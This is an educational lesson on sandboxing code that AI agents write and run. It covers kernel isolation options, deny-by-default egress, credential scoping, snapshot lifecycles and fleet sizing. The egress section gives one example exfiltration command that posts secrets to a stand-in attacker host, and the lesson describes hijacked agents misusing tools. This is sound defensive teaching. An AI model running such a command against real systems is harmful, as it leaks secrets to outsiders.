Pidoku

Sandboxes and Tool Execution

Advanced 50 min Difficulty 4/5 Lesson 05 of 05

Prerequisites Anatomy of an Agent, The Cluster

The idea in one minute#

Capable agents write and run code. That code is produced by a model that may have just read an attacker’s instructions, so it must be treated as untrusted code and run where it cannot hurt anything: a sandbox. A sandbox is defined by three walls — what the code can execute against (kernel isolation), what it can reach (network egress) and what it can see (files and credentials). Agents also changed what a sandbox has to be: not a millisecond function, but a stateful workspace that lives for hours, mostly idle, and must start in well under a second.

A picture#

flowchart LR
  AG[":i-bot: <b>Agent harness</b><br/><small>trusted, holds credentials</small>"] -->|"run this command"| CTL[":kubernetes: <b>Sandbox controller</b><br/><small>claim from warm pool</small>"]
  CTL --> SB
  subgraph SB["One sandbox per task"]
    direction TB
    WS[":i-terminal: <b>Shell + workspace</b><br/><small>model-written code runs here</small>"]
    FS[(":i-hard-drive: <b>Scoped files</b><br/><small>this task's repo only</small>")]
    WS --- FS
  end
  SB --> ISO[":gvisor: <b>Isolation boundary</b><br/><small>gVisor or microVM</small>"]
  ISO --> HOST[":linux: <b>Host kernel</b>"]
  SB -->|"all traffic"| EG[":envoyproxy: <b>Egress proxy</b><br/><small>allowlist, credential injection</small>"]
  EG --> OK[":github: <b>Allowed hosts</b>"]
  EG -.->|"blocked"| NO[":i-ban: <b>Everything else</b>"]
  AG -.->|"no secrets cross"| SB
  class AG compute
  class CTL queue
  class WS warn
  class FS memory
  class ISO,HOST neutral
  class EG io
  class OK neutral
  class NO warn

How it really works#

Wall 1 — kernel isolation#

An ordinary container shares the host kernel; a kernel exploit escapes it. For untrusted code that is too thin. The options, weakest to strongest:

TechnologyMechanismStart timeOverheadUse
Container (runc)Namespaces, cgroups, seccomp~100 msLowestTrusted code only
gVisorA user-space kernel intercepts system calls~100–200 msSome, on I/O-heavy workMulti-tenant code execution with good density
MicroVM (Firecracker, Kata Containers, Cloud Hypervisor)A real VM boundary with a minimal device model~125–300 ms; less from a snapshotMemory per VMStrongest isolation; hostile multi-tenancy
WebAssemblyA capability-based language VMMillisecondsLimited system accessSmall, pure computations and plug-ins

The rule: code written by a model on behalf of one tenant must be isolated from other tenants by at least a user-space kernel, and by a VM boundary when tenants are mutually hostile.

Wall 2 — network egress#

A sandbox with open internet access is an exfiltration tool: curl attacker.example -d @secrets. Deny by default, then allow what the task needs:

  • No egress for pure computation.
  • An allowlist of hosts — package registries, the task’s own repository host — enforced by a proxy outside the sandbox.
  • No access to cloud metadata endpoints or the internal network, ever.
  • DNS goes through the proxy too; DNS queries are an exfiltration channel.

Egress control is the single most effective defence against data theft by a hijacked agent, because it holds even when every other control has failed.

Wall 3 — files and credentials#

  • Mount only this task’s files. Not the home directory, not other tenants’ workspaces.
  • No long-lived secrets inside the sandbox. When the code must call an authenticated API, the egress proxy injects the credential on the way out, so the code never holds it.
  • Where a token must be inside, make it short-lived and scoped to the single resource the task needs — one repository, read-only if possible.
  • The harness, which holds real credentials and talks to the model, runs outside.

The lifecycle agents need#

A serverless function lives for milliseconds. An agent’s sandbox is different:

create      from a pre-built image or a memory snapshot       target: < 300 ms
work        commands arrive over minutes or hours; mostly idle between model calls
pause       snapshot memory and disk; release CPU and RAM      while waiting on a human
resume      restore the snapshot; processes continue           target: < 1 s
fork        copy a snapshot to try two approaches in parallel
destroy     wipe everything; nothing survives into another task

Three techniques make this affordable: warm pools of pre-started sandboxes claimed on demand, snapshots so that an idle sandbox costs storage rather than memory, and copy-on-write file systems so a 5 GB repository checkout is not copied per task.

On Kubernetes this is now a standard API. The Agent Sandbox project under SIG Apps defines a Sandbox resource — a stateful, singleton, idle-heavy workload with a stable identity — together with templates, claims and warm pools, and runs on gVisor or Kata Containers. Managed versions exist on the major clouds, and specialised providers such as E2B, Modal and Daytona sell the same capability as a service.

The sandbox is one layer, not the defence#

A sandbox contains what the code does. It does not constrain what the agent does through its legitimate tools. An agent tricked into calling send_email with customer data has not escaped anything. So the sandbox works together with:

Other tools that need containment#

ToolRiskContainment
Browser automationPages contain injections; sessions hold loginsA browser per task in a sandbox; no saved credentials; domain allowlist
Local MCP servers (stdio)Run with the user’s privilegesLaunch inside a sandbox; pin versions
File toolsPath traversal, overwriting configurationA workspace root that paths cannot escape; protected files
Database toolsDestructive or exfiltrating queriesRead-only role by default; row limits; statement allowlist
ShellEverythingSandbox, plus command policies for defence in depth

Sizing a sandbox fleet#

concurrent agent tasks at peak           2,000
sandbox size                             1 vCPU, 2 GB while active
share active at any moment               ~15%   (the rest wait on model calls or humans)

without pause:  2,000 × 2 GB             = 4,000 GB of memory reserved
with pause:       300 × 2 GB + snapshots ≈   600 GB + storage
warm pool:      enough to cover the arrival rate × create time, e.g. 50 ready

Sandboxes are CPU workloads and should run on their own node pool, separate from pods that hold credentials and from GPU nodes.

Remember this#

  • Model-written code is untrusted code.
  • Three walls: kernel isolation, egress control, scoped files and credentials.
  • gVisor or a microVM for anything multi-tenant; never a plain container.
  • Deny egress by default; inject credentials at the proxy.
  • Agent sandboxes are stateful and idle-heavy: warm pools, snapshots, pause and resume.
  • The sandbox contains code, not the agent’s use of legitimate tools.

Try it#

  1. For a coding agent, write the egress allowlist. What breaks if you forget the package registry, and what is exposed if you allow *?
  2. Recompute the fleet sizing for 10,000 concurrent tasks at 10% active.
  3. An agent needs to push a branch to one repository. Describe the credential it uses: scope, lifetime, and where it is held.

Check yourself#

  1. Why is a plain container insufficient for model-written code in a multi-tenant system?
  2. Which wall still protects data after an agent has been fully hijacked?
  3. What does a sandbox not protect against?

Sources#

↑↓ navigate↵ openesc close

drag to pan · scroll to zoom